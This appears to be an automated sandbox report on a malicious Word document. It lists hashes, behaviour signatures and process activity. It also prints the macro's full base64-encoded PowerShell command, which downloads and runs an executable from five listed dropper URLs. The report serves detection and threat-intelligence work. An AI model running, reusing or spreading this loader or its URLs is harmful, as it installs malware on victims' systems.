Analysis

  • max time kernel
    108s
  • max time network
    46s
  • platform
    windows7_x64
  • resource
    win7-20220718-en
  • resource tags

    arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system
  • submitted
    24-07-2022 20:41

General

  • Target

    163eae697eb7cadb346c9c9b7f430a9a1b5859e9354415969a54565149811ae8.doc

  • Size

    129KB

  • MD5

    4988f095e0986dd8876fc88a8ed9c223

  • SHA1

    ed1836eebfd4e0c870ca33c29e8d5b261300a7f0

  • SHA256

    163eae697eb7cadb346c9c9b7f430a9a1b5859e9354415969a54565149811ae8

  • SHA512

    000c084b82f8fc94cd4fb8c9fba383cfd97ab19b51ff833989cc302ad5b467fe64bca7eb5ad2c516e88060da92d1280002724d73d0bab2731c2fb92157bdaa97

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://tan-shuai.com/wp-content/m6d71gnvv_5wuf035-3782344/

exe.dropper

http://rashhgames4u.000webhostapp.com/wp-admin/f09dmz1i98_gkhufhnf3-7958618171/

exe.dropper

http://bor-demir.com/cgi-bin/hlptlehdyU/

exe.dropper

http://klaryus.com.br/wp-includes/Requests/Zqeztqfe/

exe.dropper

https://theluxestudio.co.uk/wp-includes/pTxzfSBe/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 9 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\163eae697eb7cadb346c9c9b7f430a9a1b5859e9354415969a54565149811ae8.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1964
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1348
    • C:\Windows\System32\WindowsPowerShell\v1.0\pOwershell.exe
      pOwershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABYAHYAbQBJAFgAdgBvAD0AJwB0ADYAagBUAGIATQAnADsAJABQAGIARABMADQAMwAgAD0AIAAnADcAMQAnADsAJAB1AGoANgBFAFYAdQB2AD0AJwBMADgASwBNAGsAawBYACcAOwAkAFgAaQB2AEsASgBpAEsAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFAAYgBEAEwANAAzACsAJwAuAGUAeABlACcAOwAkAFEAWQBFAHcARwBpAEQAPQAnAGsAdQAzAE8AXwBUACcAOwAkAGoARABhAGwAXwBZAEEAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4ARQBgAFQALgB3AGUAYABCAEMATABJAEUAbgBUADsAJABFAE4AegA2AEIAMAA9ACcAaAB0AHQAcAA6AC8ALwB0AGEAbgAtAHMAaAB1AGEAaQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAG0ANgBkADcAMQBnAG4AdgB2AF8ANQB3AHUAZgAwADMANQAtADMANwA4ADIAMwA0ADQALwBAAGgAdAB0AHAAOgAvAC8AcgBhAHMAaABoAGcAYQBtAGUAcwA0AHUALgAwADAAMAB3AGUAYgBoAG8AcwB0AGEAcABwAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBmADAAOQBkAG0AegAxAGkAOQA4AF8AZwBrAGgAdQBmAGgAbgBmADMALQA3ADkANQA4ADYAMQA4ADEANwAxAC8AQABoAHQAdABwADoALwAvAGIAbwByAC0AZABlAG0AaQByAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AaABsAHAAdABsAGUAaABkAHkAVQAvAEAAaAB0AHQAcAA6AC8ALwBrAGwAYQByAHkAdQBzAC4AYwBvAG0ALgBiAHIALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBSAGUAcQB1AGUAcwB0AHMALwBaAHEAZQB6AHQAcQBmAGUALwBAAGgAdAB0AHAAcwA6AC8ALwB0AGgAZQBsAHUAeABlAHMAdAB1AGQAaQBvAC4AYwBvAC4AdQBrAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AcABUAHgAegBmAFMAQgBlAC8AJwAuAHMAcABMAGkAdAAoACcAQAAnACkAOwAkAHcAZABYAGEAMwBYAGIASwA9ACcAdwByAFYAMAA3ADUAawB1ACcAOwBmAG8AcgBlAGEAYwBoACgAJABBAFYARgBiAEkAdgBfAFkAIABpAG4AIAAkAEUATgB6ADYAQgAwACkAewB0AHIAeQB7ACQAagBEAGEAbABfAFkAQQAuAEQAbwB3AG4AbABPAEEAZABGAEkAbABFACgAJABBAFYARgBiAEkAdgBfAFkALAAgACQAWABpAHYASwBKAGkASwApADsAJABGAGMAWABCAHUAaQBDAD0AJwB6ADkAMgAzAG0AbQA1AEsAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJABYAGkAdgBLAEoAaQBLACkALgBsAEUAbgBnAHQASAAgAC0AZwBlACAAMgA0ADEAMAAzACkAIAB7AC4AKAAnAEkAbgAnACsAJwB2AG8AawAnACsAJwBlAC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAFgAaQB2AEsASgBpAEsAOwAkAGgAbgByADMASAA2AD0AJwBwADkAcABQAHoAMwAzAGgAJwA7AGIAcgBlAGEAawA7ACQAagBYAFUATwBiAGEAcwA9ACcAbABYAEMAdABYAFIAZAAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGEANQAxAGoAVABaAHcAVgA9ACcAegB2AEYAegB3AGoAJwA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1636

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1348-58-0x0000000000000000-mapping.dmp
    • memory/1348-60-0x000007FEFC331000-0x000007FEFC333000-memory.dmp
      Filesize

      8KB

    • memory/1636-78-0x000007FEF3E30000-0x000007FEF4853000-memory.dmp
      Filesize

      10.1MB

    • memory/1636-84-0x00000000023CB000-0x00000000023EA000-memory.dmp
      Filesize

      124KB

    • memory/1636-83-0x00000000023C4000-0x00000000023C7000-memory.dmp
      Filesize

      12KB

    • memory/1636-81-0x00000000023CB000-0x00000000023EA000-memory.dmp
      Filesize

      124KB

    • memory/1636-79-0x000007FEF32D0000-0x000007FEF3E2D000-memory.dmp
      Filesize

      11.4MB

    • memory/1636-80-0x00000000023C4000-0x00000000023C7000-memory.dmp
      Filesize

      12KB

    • memory/1964-59-0x00000000716ED000-0x00000000716F8000-memory.dmp
      Filesize

      44KB

    • memory/1964-62-0x00000000005D8000-0x00000000005F9000-memory.dmp
      Filesize

      132KB

    • memory/1964-61-0x00000000005D8000-0x00000000005F9000-memory.dmp
      Filesize

      132KB

    • memory/1964-65-0x00000000005D8000-0x00000000005F9000-memory.dmp
      Filesize

      132KB

    • memory/1964-69-0x00000000005D8000-0x00000000005F9000-memory.dmp
      Filesize

      132KB

    • memory/1964-73-0x00000000005D8000-0x00000000005F9000-memory.dmp
      Filesize

      132KB

    • memory/1964-63-0x00000000005D8000-0x00000000005F9000-memory.dmp
      Filesize

      132KB

    • memory/1964-64-0x00000000005D8000-0x00000000005F9000-memory.dmp
      Filesize

      132KB

    • memory/1964-54-0x0000000072C81000-0x0000000072C84000-memory.dmp
      Filesize

      12KB

    • memory/1964-57-0x00000000768F1000-0x00000000768F3000-memory.dmp
      Filesize

      8KB

    • memory/1964-82-0x00000000716ED000-0x00000000716F8000-memory.dmp
      Filesize

      44KB

    • memory/1964-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1964-55-0x0000000070701000-0x0000000070703000-memory.dmp
      Filesize

      8KB

    • memory/1964-85-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1964-86-0x00000000716ED000-0x00000000716F8000-memory.dmp
      Filesize

      44KB